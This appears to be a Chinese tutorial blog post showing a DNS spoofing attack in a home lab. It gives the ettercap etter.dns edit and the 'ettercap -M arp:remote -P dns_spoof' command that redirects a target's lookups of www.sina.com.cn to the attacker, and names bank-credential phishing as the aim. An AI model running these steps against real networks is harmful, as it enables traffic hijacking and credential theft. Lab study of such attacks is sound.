DNS欺骗攻击

这篇文章将为大家详细讲解有关DNS欺骗攻击，文章内容质量较高，因此小编分享给大家做个参考，希望大家阅读完这篇文章后对相关知识有一定的了解。

DNS欺骗攻击： 目标将其DNS请求发送到攻击者这 里，然后攻击者伪造DNS响应，将正确的IP地址替换为其他IP，之后你就登陆了这个攻击者指定的IP，而攻击者早就在这个IP中安排好了一个伪造的网站 如某银行网站，从而骗取用户输入他们想得到的信息，如银行账号及密码等，这可以看作一种网络钓鱼攻击的一种方式。

1、使用另一台kali linux 作为攻击靶机，查看主机IP 地址 :192.168.127.211 ,网关地址为：192.168.127.2 , 正常执行:ping www.sina.com.cn可以看到解析的地址为：183.232.24.222；

2、 使用kali 进行攻击，查看攻击者机ip地址：192.168.127.208，修改ettercap配置文件：vim /etc/ettercap/etter.dns，

3 、增加一条新的A纪录，将www.sina.com.cn 解析指向攻击者主机，保存退出；

4、开始进行DNS欺骗攻击：ettercap -i eth0 -Tp -M arp:remote -P dns_spoof /192.168.127.211// /192.168.127.2// ；

5、进行DNS 欺骗后，再次测试：ping www.sina.com.cn ，发现将www.sina.com.cn 解析指向了攻击者主机（192.168.127.208）

成功执行DNS 欺骗攻击，到此结束！！！

关于DNS欺骗攻击就分享到这里了，希望以上内容可以对大家有一定的帮助，可以学到更多知识。如果觉得文章不错，可以把它分享出去让更多的人看到。